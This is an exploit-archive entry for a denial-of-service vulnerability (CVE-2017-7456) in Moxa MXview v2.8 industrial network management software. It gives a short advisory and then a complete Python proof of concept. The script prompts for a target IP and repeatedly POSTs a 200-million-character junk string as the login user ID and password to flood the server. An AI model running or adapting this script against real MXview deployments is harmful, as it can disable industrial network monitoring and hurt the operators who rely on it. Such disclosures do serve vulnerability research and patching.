Lucene search

K
zdtHyp3rlinx1337DAY-ID-27549
HistoryApr 10, 2017 - 12:00 a.m.

Moxa MXview v2.8 Denial Of Service Exploit

2017-04-1000:00:00
hyp3rlinx
0day.today
43

0.134 Low

EPSS

Percentile

95.6%

Exploit for windows platform in category dos / poc

[+] Credits: John Page AKA hyp3rlinx

Vendor:
============
www.moxa.com


Product:
===========
MXView v2.8

Download:
http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.

Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notificationβ€”anytime, anywhere.



Vulnerability Type:
===================
Denial Of Service



CVE Reference:
==============
CVE-2017-7456



Security Issue:
================
Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials.



Exploit/POC:
=============
import urllib,urllib2

print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'

IP=raw_input("[Moxa MXView IP]>")

PAYLOAD="A"*200000000

url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})

while 1:
req = urllib2.Request(url, data)
res = urllib2.urlopen(req)
print res

#  0day.today [2018-03-02]  #